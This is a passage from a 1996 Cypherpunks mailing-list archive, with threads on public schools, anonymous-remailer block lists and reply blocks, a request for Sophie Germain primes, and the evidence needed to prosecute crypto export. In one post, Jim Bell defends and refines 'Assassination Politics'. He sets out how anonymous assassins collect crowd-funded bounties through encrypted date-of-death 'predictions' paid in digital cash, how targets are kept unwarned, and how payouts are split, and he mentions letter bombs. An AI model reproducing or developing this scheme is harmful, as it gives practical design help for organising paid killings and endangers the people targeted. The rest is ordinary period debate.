>teaching Assassination Politics is pretty impressive.)

Now, ignoring the humorous parts, wouldn't that be a scary thought?  Pro-AP
high school students?  I could just imagine the death toll rising as the
"popular" students are knocked off by jealous rivals,  as the dumped
[boy/girl]friend gets even, etc.  It'd be hard for any non-homeschooled
student to live to 18.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:21:21 +0800
To: "tcmay@got.net>
Subject: Re: Public Schools
Message-ID: <19960929061007859.AAA183@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote:

>>        a very unusual situation  --but I live in rural southern utah
>>    where the regional middle school of 1200 can support 4 bands, the
>>    top 2 being very impressive, and provide full AP classes, and ACT

>Wow! Utah is teaching AP?  Is Jim Bell being brought in as a Special Lecturer?
>(I knew Idaho has special Militia classes, but to hear that Utah is now
>teaching Assassination Politics is pretty impressive.)

Now, ignoring the humorous parts, wouldn't that be a scary thought?  Pro-AP
high school students?  I could just imagine the death toll rising as the
"popular" students are knocked off by jealous rivals,  as the dumped
[boy/girl]friend gets even, etc.  It'd be hard for any non-homeschooled
student to live to 18.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 16:43:18 +0800
To: remailer-operators@c2.org
Subject: Re: Making Remailers Widespread [REMAILERS]
Message-ID: <199609290623.XAA25604@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There have been several good replies - thanks!

>> Doing two-way remailers would be better, but that's still a hard problem,
>> and I don't want to widely deploy shoddy two-way-remailers.

>Unfortunately, one-way remailers have much fewer uses than two-way remailers,
>any many of these uses are abusive.

I agree, it's a problem; the return address seems to reduce abuse.
But one-way remailers can be used to simulate many of the uses of two-way,
especially with message-pool return methods (e.g. alt.anonymous.messages.)
Doing two-way remailers well is hard - most of the methods around are ok
for passive attacks, but may not resist subpoenas, rubber-hose, or crackers.
It's especially hard if you want the remailer to be a no-brainer to install
and operate, rather than one that requires expert support.

Snow's one-shot reply block method is interesting, whether you do a public-key
or secret-key approach (if you do public key, you obviously use the public
half for the part that stays at the remailer.)  It has the real advantage that
compromising the remailer doesn't give you the reply information for past or
current messages, so you can only compromise one message at a time,
which is a big win over the one-key-per-remailer reply blocks.
I think I like it.

On the other hand, there are a host of potential problems:
- Chaining is probably more difficult, at least return-chaining.
- Individual True Believer remailer operators would usually resist
cooperating with authorities to decrypt the reply block, but ad-hoc
remailer operators who are just running a remailer because they haven't
turned off the default feature that came with their Web Server
will probably reveal the key, especially for Politically Incorrect material
(definition depends on their individual politics, of course.)
- A web form interface, filled out from a web anonymizer, doesn't
give you a useful return address, so spammers can still abuse it.
- You have to decide how much persistence to use for the reply block.
One-shots are more secure, but aren't helpful for replies to web postings
or other multiple-recipient communication, but timeouts have their own problems.

>> - A centralized block list (e.g. http://www.remailer.net/block.txt)
>> which all of the form-based remailers could load and reference would
>> allow non-picky operators not to have to handle it themselves
>A single centralized point of failure is bad. Maybe 4 or 5 redundant ones.
>A blocking request sent to one will be replicated in the other automatically.

Good point.  A bit tough to implement in a no-brainer out-of-the-box remailer;
you gain a bit by having the block list point to an address that's really
a round-robin DNS spinner of some sort, but that still leaves you with
centralization.

>> [centralized blocking list; handshake with cookies ]
>>         - this is a bit messier for mailing lists, but we can ignore...
>
>We can't quite ignore... In the scheme you've just described, someone can
>enter a blocking request via a Web page and give a submission request for
>some mailing list, and the cookie will be e-mailed to the mailing list.

Yeah.  This makes it easy to block anonymous remailer input to (say)
the cypherpunks mailing list, since _any_ mailing list user can block.
Putting a never-block list at the blocking server is a possibility,
and would require some announced policy for implementing it.

>>         - special-case for "postmaster", who may want to block
>>                 all of foo.domain instead of just postmaster@foo.domain
>>         - special-special-case for postmasters of big sites, e.g. aol, netcom
>>                 who we may want to ignore?

>I don't think it's a good idea to suport blocking receivers in an entire
>domain, like *@aol.com. Just say it's not supported.

Blocking an entire domain like *@aol.com is mostly bad.
Blocking an entire domain like *@myconsultingfirm.com is fine.
Deciding the boundary between the two is, um, amusing :-)
I'd probably set it such that ISPs don't get blocked, but non-ISPs do,
though that might change if the administrator of aol.com asks 
five million users to submit individual blocking request.
I suppose this means there's a volume question here :-)
Having a don't-block list that individuals can subscribe to would help.

>> - A sender-blocking list is harder, and may still take human attention
>I don't think it's a good idea to support sender blocking at all.

There are some spammers you'd like to stop quickly when a Spam Event 
is happening.  There are broken email gateways that may need blocking.
There are known abusers you might want stopped.  And there are folks like
president@whitehouse.gov who can be presumed to be forgeries :-)
A sender-blocking list administered by the Remailer Cabal* would be
a reasonable default for no-brainer remailers, and obviously it
should be possible for remailer-admins to override or ignore if they want.


>Would the receiver blocking list be available to everyone to view? That
>sounds like a violation of privacy. Someone suggested on this list that
>(assuming that the entires are addresses that match exactly, not regular
>expressions), one can store hashes of addresses. 

That's worth doing, or at least thinking about seriously.
The most interesting regular expressions are *@domain (which you can
handle by keeping separate block lists for domains and full addresses
(or a merged list that the using remailer checks both)) and
*@*.domain and user@*.domain - e.g. alice@mailserver17.big-isp.com,
which would successfully deliver mail to alice@big-isp.com.
Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com)
and check subsets of the domain name?  This is creeping featurism,
but it may be the right way to go to set a good precedent.

One unfortunate result of only using hashed names and not 
readable names is that it doesn't help the current remailer operators,
since their existing code doesn't work that way.  
Keeping the file of real names encrypted and only distributing it
to the Remailer Cabal seems leaky at best :-) - I'd expect to see it
remailed to some public place just on principle.

snow wrote:
> Off the top of my head, the biggest problem is that you can't send 
> email to a web site (page).
You can easily send it to a procmail program at a web site, though,
which can take care of doing the right thing with it.
Mark M.'s pointer to netcat is especially relevant for this.
> Netcat can be used pretty easily to fetch URLs 
> (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80). 

[*The existence of the Remailer Cabal, viewed by some as a 
shadowy subversive conspiracy, and by others as Dedicated Public Servants
has been repeatedly denied by anyone in a position to know. :-) ]

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 16:22:16 +0800
To: remailer-operators@c2.org
Subject: Re: Making Remailers Widespread
Message-ID: <199609290623.XAA25627@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 9/28/96 -0400, "Mark M." <markm@voicenet.com> wrote:

>Since maintaining a block list is probably one of the most time-consuming tasks
>involved with operating a remailer, it would be a Good Thing to add an option
>to the remailer cgi program to operate as a "middleman" remailer.  This would
>only require the remailer operator to add or remove entries from a list of
>allowed destinations.  The operator wouldn't have to deal with disclaimers and
>would only receive complaints from other operators if the remailer is
>malfunctioning in some way.

That's another good approach, though a second-string objective compared
to having full-scale terminal remailers running everywhere.
But it's clearly a strong fallback position, and might be easier to
get people to adopt and not turn off.  It does depend on the availability
of a list of working remailers with the correct feature sets,
plus adequate distribution of either PGP keys or some S/MIME-related equivalent.

One way to do that is to parse Raph's list appropriately (and check
signatures on that); another is to have some centralized (sigh) DNS server
do a round-robin distribution so that random.remailer.net picks a
random known-good remailer to deliver through, perhaps also delivering a PGP
key.

I'd far prefer a distributed solution, but this does let people volunteer
to take heat for a little while and dispose of their remailers if they
have to.  In particular, it may be useful for winsock remailers that
are willing to connect up and be a delivery remailer when they're connected
and disconnect when they're unavailable.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: themom <themom@nando.net>
Date: Sun, 29 Sep 1996 13:39:32 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Public Schools
In-Reply-To: <Pine.LNX.3.94.960928114445.4129A-100000@anx0918.slip.appstate.edu>
Message-ID: <Pine.SUN.3.91.960928231926.13572A-100000@bessel.nando.net>
MIME-Version: 1.0
Content-Type: text/plain


I have to agree with the final Quote....I am Good in math, chemistry and 
computer science I am good in any Logical cource but I have trouble in 
places liek " Creative Writing" I take all AP cources and make A's and 
B every now and again in english...I have a 3.7 gpa but a LOW sat in the 
grammar and english sections, 1100 in all I don't think colleges should 
look at the subjects you dont plan to major in...I plan to major in 
computer science when I go to college, so I dont think they should look 
so much at say english, or biology.  I get so frustrated in some of those 
classes....BTW I am a Junior in highschool


Brent

On Sat, 28 Sep 1996, The Deviant wrote:

> On Fri, 27 Sep 1996, snow wrote:
> 
> > Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT)
> > From: snow <snow@smoke.suba.com>
> > To: jbugden@smtplink.alis.ca
> > Cc: cypherpunks@toad.com
> > Subject: Re: Public Schools
> > 
> > James said:
> > > ronsimpson@unidial.com wrote:
> > > >I hate to burst any bubbles but, the school with the highest number
> > > > of National Merit Finalists and highest number of 1600 SATs is a=20
> > > > Public High School (Jefferson High in Fairfax, VA)
> > > The same is true for Montreal (Royal Vale) using the equivalent scoring methods.
> > > But there are public schools at both extremes of the curve.
> > > While it is true that Private Schools would not survive due to market forces if
> > > they did consistently poorly, it is also true that they filter their incoming
> > > student body in a manner that Public Schools can not.
> > > If you want to refuse those who are too stupid or anti-social from Public
> > > Schools in order to improve the social or intellectual climate, you better have
> > > a solution for the resulting cast-offs.
> >  
> >      There is a solution. Trade Schools, and Parental Envolvement. It could 
> > very well be (and if I had the money I'd make the bet) that _many_ of the 
> > "troubled" youth of today are simply undisiplined. (Fortunately, most of 
> > them couldn't afford to bet against their parents in an AP world). It would
> > also seem to follow that if parents were spending their own money (or 
> > perceived it as their own money) that they would take a greater interest in
> > their childrens education.
> >    
> >       For those that are truly not scholastically oreinted, there would be
> > trade schools. I would also bet that you could teach a child everything they
> > need to learn (other than a trade) to cope in this world in about 4 years. 
> > 
> 
> But now we must make a disinction... I'm LD in writing, but can read very
> well (when I was in 6th grade I could read like a 10th grader), and do
> very well in Math and Computer classes (and non-biological/anatomical
> sciences).  So should I be in trade school, because I plan on being a
> computer programmer, or go to college?  Sure, I don't do well in language
> and (depending on the class) some history classes, which, IMHO, are
> weighted more heavily than they should be in both public _and_ private
> schools (and yes, I've been to both), but I don't think that should mean I
> can't go to college...
> 
> Anyway, my point is that there is, at times, a very fine line...
> 
>  --Deviant
> When we write programs that "learn", it turns out we do and they don't.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:27:45 +0800
To: "snow@smoke.suba.com>
Subject: Re: Public Schools
Message-ID: <19960929062437375.AAA157@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Sep 1996 20:53:51 -0500 (CDT), snow wrote:

>> = .     There is a solution. Trade Schools, 
>>         The problem was simple:  we have only the now retiring
>>     toolmakers who make it all possible.  engineering graduates will
>>     not observe the manufacturing floors since it is above their 
>>     dignity to roll of their sleeves.
>     I knew too many engineering students to believe this. I knew one
>(Civil Engineering) who had been a Paramedic, he wanted grease and
>dirt on his hands, it may be harder to wash off, but much easier to
>sleep off. 
Nice point, BTW!

I think he was engaging in a bit of hyperbole but he still had a point.  How
many people (in any profession) have had to use what they produce?   How many
hardware engineers types have had to actually hook up a mission critical
network with the router they designed?   More likely, how many of you on the
list work for someone who has done the same work you're doing?   How many of
the programmers have to use their own programs on a daily basis?  Now,
compare with the rest of the world (particularly on that last one).

>     Prove? I don't know, but it is some pretty solid evidense. Communism
>at it's finest. A community of people who work together and take care of 
>each other voluntarily for the common good. <hee hee> 

Communism should sound familar to any Jew or Christian.   The idea of caring
for others in the community is a key part - it's hard to say that you have
love for your neighbor if you can't give him a meal while he's out of work
(assuming of course you have food yourself - although many in the great
depression did anyway).   It's when this kind of activity is state-mandated
that you have this problem.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:36:52 +0800
To: "The Deviant" <themom@nando.net>
Subject: Re: Public Schools
Message-ID: <19960929063154625.AAA234@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Sep 1996 23:23:32 -0400 (EDT), themom wrote:

>I have to agree with the final Quote....I am Good in math, chemistry and 
>computer science I am good in any Logical cource but I have trouble in 
>places liek " Creative Writing" I take all AP cources and make A's and 
>B every now and again in english...I have a 3.7 gpa but a LOW sat in the 
>grammar and english sections, 1100 in all I don't think colleges should 
>look at the subjects you dont plan to major in...I plan to major in 
>computer science when I go to college, so I dont think they should look 
>so much at say english, or biology.  I get so frustrated in some of those 
>classes....BTW I am a Junior in highschool

I recently graduated HS and am at the local community college preparing to
transfer to a 4-year.  Meaningless indicators as follows:  3.9GPA,  1490 SAT
(800 Verbal 690 Math - I haven't had a math course since Trig/Precalc in my
sophomore year - I was 2 years ahead but moved to 2 districts which didn't
even have calculus) - which is up 120 points from my freshman year.

Anyway, as far as what colleges look for, they do care about non-major
classes but don't, obviously, weight them as highly.   As far as the real
world (i.e. employment) goes, many places realize you aren't going to learn
much in 4 years.  They want to see not that you have specific experience but
that you know how to think and especially how to teach yourself.   If you can
show that you can adapt well to market changes you probably won't have to
worry about work...

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Serge E. Hallyn" <hallyn@cs.wm.edu>
Date: Sun, 29 Sep 1996 13:56:01 +0800
To: cypherpunks@toad.com
Subject: sophie germain primes
Message-ID: <199609290344.XAA05661@astro.cs.wm.edu>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone direct me to an online list of small (less than 800-digit)
Sophie Germain primes?

(actually any list would do)

many thanks,
-serge

hallyn@cs.wm.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 29 Sep 1996 17:15:14 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Technical difficulties with AP [AP NOISE]
Message-ID: <199609290715.AAA12227@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 9/28/96 -0700, Bill Stewart wrote:
>Aside from details like dead bodies, vendettas, and government suppression,
>there are technical complications with Assassination Politics
>that make it more than the simple job Jim Bell is imagining.
>Some of them provide ways to defend against AP, and turn it into more like
>Extortion Politics.
>
>        [Do I _really_ want to bring up more discussion of AP?
>        Not sure, but if it's clear that it won't work very well,
>        it'll be less likely for the government media to freak about :-)]

OTOH, if it's going to work, the earlier you're satisfied about that the 
better, huh?


>Let's look at the critical part of the problem - paying the assassin.
>The model we've generally been using is that the players are the
>victim, the escrow agent who manages the system, an enthusiastic public,
>and the assassin or assassins who are competing for the jackpot.

All of whom could play multiple roles in difference circumstances, 
incidentally, at different times.  The public should be particularly 
interested in this process, BTW, because they realize that someday they may 
want to participate as donors, bettors, or they may have no choice but to 
participate as...victims.


>I can see three approaches to identifying the correct payee:
>1) Payee provides physical evidence to the escrow agent - 
>        the traditional approach doesn't work here: since the
>        escrow agent is anonymous, so you can't mail him the
>        victim's wallet or finger with well-known fingerprint or whatever.
>2) Assassin leaves physical evidence at the scene which the news media
>        would be likely to report, which payee confirms with escrow
>        agent, presumably committing in advance (e.g. after the event,
>        the payee sends a key which allows the escrow agent to decode
>        the encrypted message that said "I'm leaving a note on the body
>        saying 'Jacques De Molay is Avenged - Assassin's Guild Member 
#32767'.")
>        Works fine for the first couple of assassinations, but after a while
>        the police will catch on and stop revealing kinky details to the 
media.
>3) The main solution has been the gambling deal - 
>        it's just a lottery on the date of death of the victim, which 
presumably
>        the payee will win because he knows when the assassin will strike.
>        For a lottery to be effective, prospective assassins need to
>        be able to determine how much the jackpot is and who the victim is,
>        so they can place their bets and be the closest winner.

There are a number of advantages to the gambling scenario.  The first, 
obviously, is that it is, technically, gambling, and gambling is legal in 
many locales and "accepted" (morally) in most.  The second is that being 
gambling, no participant other than an assassin knows, for sure, that the 
person collecting the payoff is actually guilty of any crime.  A third is 
that to many people, gambling is fun, which means that they are already 
primed to partipate.


>        But the prospective victim can also play, individually or as part
>        of an insurance pool (which is especially valuable for victims like
>        "the first IRS agent to be assassinated".)  Obviously you don't want
>        to just bid up the price on your own head, so it needs to be 
accompanied
>        by publicity that the IRS Agents' Benevolent Association is placing
>        a large number of small bets every day to maximize the chances that
>        _they_ will collect the money rather than the assassins.
>        If the times that the bets are for are published, you can beat this,
>        but you also invite speculators to be small bets just before and after
>        your bets, so it becomes a mishmash and perhaps a race condition.
>        If the times aren't published, the assassin can make lots of bets
>        surrounding the planned date of the hit, which is also a warning
>        to the prospective victim to be careful if the bets on his demise
>        start increasing rapidly.

The way I've envisioned it, the bettor must commit to his prediction, but he 
then encrypts it so that nobody else knows what he's predicted, either the 
date or the target, and he must "buy" his prediction by including digital 
cash.  One advantage of this system is that the victim isn't warned 
(although the victim is already aware of how much money has been donated to 
fund the prize), but a potential disadvantage is that there might be a 
collision between the predictions of two or more people.  This probably 
can't be entirely avoided, but it can be minimized by forcing the bettors to 
compete with their bets.  It is impractical for a person who just guesses to 
make such a bet, against somebody who knows the date.

The bettor doesn't reveal the decrypt key to the particular prediction 
involved unless he chooses to do so; when he does presumably, it's because 
the prediction has come true.  A failed prediction isn't disclosed, so it 
doesn't alert anyone else, including the  "escrow agent" AP organization.   
The amount of digital cash included with the prediction will be revealed 
publicly, the moment it is received by the organization, as well as the 
(still encrypted) prediction.  Saving these predictions allows anyone to 
verify (after the decrypt key has been released) that the prediction 
actually identified a particular person.  This allows the public and the 
other players to verify that the game is being played honestly.

       
>        This does make the AP lottery somewhat of an extortion deal - 
>        by advertising that someone is a target, you're forcing them to
>        continually make lots of bets. 

This, of course, is only true if the specifics of the predictions are 
revealed, which is not the scenario I envision.  Obviously, revealing the 
predictions allows the victim to lay low whever he's likely to be hit, which 
is why I think that's a bad idea.


>        But if they've got any way of tracing
>        money, even partially, it'll help them find the escrow agent,
>        who can then be targeted for justice of one sort or another.
>        You're also forcing the assassin to make lots of bets, though in
>        a jackpot system the successful payee will recover most of it.

It is at least conceivable that an assassin won't know the exact date he'll 
be successful.  If he sends a letter-bomb, for instance, he won't know for 
sure when that letter will be delivered, or the day it will be opened.  
However, he need merely make two or three predictions, and he won't have to 
make the last one or two unless the prediction didn't come true on the first 
day.  Multiple predictions does raise his cost, but it will still be 
economical to do given the probabilities.


>        To some extent the defense can be fought if the escrow agent
>        wants to establish a minimum bet, say $100, which an assassin
>        can afford to make a few of for the targeted day, but the
>        victim can't keep paying too much.  This also reduces the
>        since of the potential better pool, and therefore reduces
>        the jackpot and the attractiveness of the job to the assassin.
>        Lots of people might be willing to spend $5 to contribute;
>        $100 bets are much fewer, especially if there are enough
>        targets to successfully overthrow a government.

Originally, I had anticipated that the AP organization would require 
specific payments included with a prediction based on the value of the 
reward and the estimated probability of the death on any particular day.  I 
was never comfortable with this system, because it would involve a great 
deal of calculation based on numbers that no particular people know.  I 
don't know whether you saw my idea a couple weeks ago in which I pointed out 
that it should merely be necessary to allow all predictors to include 
whatever amount of money they want with their prediction, with the reward 
split up and paid to all successful predictors, pro-rated based on the size 
of their contribution.  This shifts the burden to the public to estimate the 
amount they should include, which should be okay since a predictor is 
probably a fairly good judge of the probabilities associated with his target.

At least hypothetically, it means that an assassin might have a portion of 
his reward "stolen" by another lucky  predictor, but this is unlikely and in 
any case, the fact that this loss was genuine can be verified by all 
participates after the fact.  And a predictor need merely increase the value 
included with the prediction to increase his pro-rata share of the reward.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 29 Sep 1996 16:36:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007801ae7237ed7a65@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960929015322.6668L-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, Timothy C. May wrote:

> At 5:43 PM -0400 9/27/96, Black Unicorn wrote:
> >On Thu, 26 Sep 1996, Timothy C. May wrote:
> 
> >His admission that he used the notebook.  Recovering the notebook and
> >finding the software.  Interviewing the Customs agent working at the time.
> 
> His admission that he used _which_ notebook? Chain of evidence again.
> 
> Finding _which_ software?
> 
> (As for the Customs agent, I can assure you that my luggage has never been
> checked upon either leaving the U.S. or entering the U.S. Even if U.S.
> Customs could figure out who was working at the time I putatively entered
> the country, and even if he remembered _me_, months later, just what
> records would he have, and how would they stand up in court?)
> 
> Hearing me say I "exported crypto," a hearsay claim, and happening to find
                                      ^^^^^^^^^^^^^^^
It is an admission against interest and a confession; it is admissible 
against the speaker in a prosecution against him for "exporting crypto"
from a strictly evidentiary standpoint.

> one or more laptops at my home, weeks or months later, implies nothing. (To
> make the point graphically, suppose the raiding party finds _several_
> laptops or notebooks...do they assume _all_ were taken out of the country,
> or do they pick the one with the most incriminating software on it? Answer:
> Unless they can _prove_ one of them was used, and that it had not been
> _changed_ since the putative event (highly unlikely), they cannot simply
> _assume_ one of them was taken out.

Your understanding of evidence is inaccurate.  The evidence re the 
laptop[s] would be admissible and the parties would argue about what it 
meant.  The jury is entitled to draw common sense inferences.  That might 
be easy to do in a case in which a defendant has confessed....


 
> (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not
> the one I took to Europe."   "Oh, you say this laptop has PGP 5.9 on it?
> So? I installed it last week. My trip to Europe was last summer.")

So now you, as your own lawyer (apparently) have decided to take the 
stand and testify.  Remember that the prosecutor gets to cross-examine 
you.  Things are about to get ugly.... 


> 
> >Considering the headaches required for airline travel today, it's not like
> >there aren't serious records abound.
> 
> Such as? I recall no inspections of my luggage, no inventorying of the
> serial numbers of my laptops, no inspection whatsoever of my
> magneto-optical drives (which were in my carry-on luggage, and not even
> glanced at, in the box they were in). X-rays would not prove what was taken
> in or out of the country, even if "x-ray escrow" were implemented (which it
> is not, according to all reports I have heard, and based on some practical
> limits on storage), I doubt the records of a trip, say, last summer (of
> '95) could be retrieved and prove that a particular laptop was taken out.
> Not to mention that the software allegedly taken out might have been on any
> kind of media, none of them distinguishable with an x-ray machine.

Circumstantial evidence is admissible if probative of a fact at issue in 
the case.  Evidence that you took a laptop out of the country is 
probative of the allegation that you exported crypto using a laptop.



> >For crying outloud, he admitted to the world that he took the software
> >out.  I put that in front of a jury and it looks just like the typical
> 
> "For crying out loud" is bluster, not legal argument.

And your understanding of evidence shows a misunderstanding of how the 
rules of evidence actually work in a courtroom. 


> >stupid bragging criminal.  Any defense about "I was just kidding" or "The
> >message was forged" might be interesting, but it will sound like
> >technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a
> 
> Legal proof is still needed. Given only a nebulous statement like "I
> exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
> is not enough for a case even to be brought to trial.

You are absolutely wrong.  It may not be enough for a conviction, but it 
will beat a Rule 29 motion (Motion for a judgment of acquittal) and get 
the case to the jury.

> (If it reached trial, I would expect a defense attorney to move for
> dismissal. Absent any evidence that a crime occurred, absent any proof
> beyond the nebulous hearsay statement of a "braggart," there is simply no
> basis for criminal action.)
> 
> "Stupid bragging criminals" may be common, but bragging is not in and of
> itself illegal. There still has to be evidence of a crime.

Must a jury believe that you were "just bragging" because you now, in a 
criminal trial, say that you were? 


> "Produce the body."

Perry Mason is only active in re-runs.

> 
> (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the
> body, or witnesses, does this mean I'll be found guilty? To use BU's
> phrasing, "for crying out loud.")

That's where prosecutorial discretion comes in and a judge's and jury's 
common sense comes in if the prosecutor runs amok.

BTW, I am far more willing to believe you were bragging about whacking 
Jimmy Hoffa than about exporting crypto.  Think of all the interesting 
evidence from this mailing list's archives that prosecutors would attempt 
to introduce against you ...

Not to say that *I* couldn't get you off, but not the way you propose.

EBD



> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 29 Sep 1996 14:25:54 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <199609290153.UAA00354@smoke.suba.com>
Message-ID: <199609290418.WAA23501@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199609290153.UAA00354@smoke.suba.com>, on 09/28/96
   at 08:53 PM, snow <snow@smoke.suba.com> said:


A person going by the name Attila said:


>      There is a solution. Trade Schools,

>      The problem was simple:  we have only the now retiring

>toolmakers who make it all possible.  engineering graduates will not

>not observe the manufacturing floors since it is above their

>dignity to roll of their sleeves.


     I knew too many engineering students to believe this. I knew one (Civil

Engineering) who had been a Paramedic, he wanted grease and dirt on his

hands, it may be harder to wash off, but much easier to sleep off.


        he's the exception, not the rule.  I paid my way through
    Harvard as a tool and die maker --if the engineers had to make
    some of the crap they designed, they would design them that way
    again.


>    if engineers were required to serve internships in the shops,

>as doctors are required to intern in a hospital (and the really good

>ones, the top of the class, choose what I call meat-wagon wards

>(large city ER and trauma units), the U.S. would be a far healthier

>and competitive environment.


     No argument there.


>         I know, why the meat wagon wards with their pressure and

>unreasonable hours?    experience, anything and everything comes

>through those doors every night, and it goes off the scale on the

>weekends...


     Hell, that desciribes the ER I used to work in, and it was in a

college town. (Yes, I do have a sorted job history. Everything from  a strip

joint dj. to working as a designer for a Big 7 Accounting firm).


> 
It would also seem to

> 
follow that if parents were spending their own money (or

> 
perceived it as their own money) that they would take a greater

> ânterest in their childrens education.

> =.

>         ...if they were smart enough to start about age 3.  the


     Better late than never.

            unfortunately, the conservative child care people believe
    the pattern may be irretrievably set by the age is six.  you need
    to start with the child from the gate with the nuture --reduces
    fear of abandonment, &c. and encourage trust so they will go to
    others without a tantrum, &c.

            President Hillary, of course, believes in *her* global
    village with *her* central government dictating for all
    --community raising a generation of raison heads!  --from day 1!


>     themselves after dark.  (I do admit that one good scream would

>have an extremely well-armed about to be posse out the door in 15

>seconds or less...  --and, I doubt there would be prisoners!)

        you want a concealed weapon permit? --just go register.


     In my neighborhood, screams are so common (mostly from kids playing,

and yes, I do check as often as I can) that most people don't bother to

check.


        a scream of terror is a different scream.  besides, we have 6
    families in our 8-10 acre section --33 kids between us.  and our
    air raid siren would be howling like an inbound kamikaze.


Very different worlds. My wife and I are probably the only ones who

_don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves. The

TV's were free, so were 2 of the computers.

        we're light on computers at the moment --only 3, and I need 3
    more.    bookshelves?  30 feet, floor to ceiling, packed. trying
    save enough to get one of the 7 CD rom up in parallel deals for
    the 8G freeBSD fileserver --OS/2 (merlin) workstations. stuff is
    expensive, even when you buy right.

        well, out here, probably 20% of the families did not have a
    TV;  I gave the "message" one Sunday a couple months ago and
    the percentage has gone up.  those who did have TVs have them
    severely restricted for content --there are no R movies
    tolerated --and most do not bring in a commercial signal --VCRs.

        the population base is changing with an influx of non-Mormons
    in town, so R rated are showing up at the theatres and video
    rentals in town.

        the police visible prescence is effective --a force of 50+ for
    a population base < 25,000, plus the county sherrif cars and the
    state police.   Curfew is 10pm weekdays for minors --and they
    enforce it, big time.  midnight Fri/Sat.


>         a very unusual situation  --but I live in rural southern utah

>where the regional middle school of 1200 can support 4 bands,

>

>and, where an average ward (100-150 families) will have at

>least a dozen Eagle scouts.

>         proves your point, I guess...

        ...idle hands are the devil's workshop. you want good solid
    kids, you start from the gate and keep 'em busy: home, neighbors,
    school, church, etc.

            yes, you work hard for it --every day.  I have 5, and it
    can be a real task with internecine warfare and all that good
    stuff.   It starts at home and goes the route.  there is no dead
    time on a streetcorner, or at friends house without a parent home.

            they do not date until they are 16 --in groups.  boys and
    girls --the same rules.


     Prove? I don't know, but it is some pretty solid evidense.

Communism at it's finest. A community of people who work

together and take care of  each other voluntarily for the common

good. <hee hee>

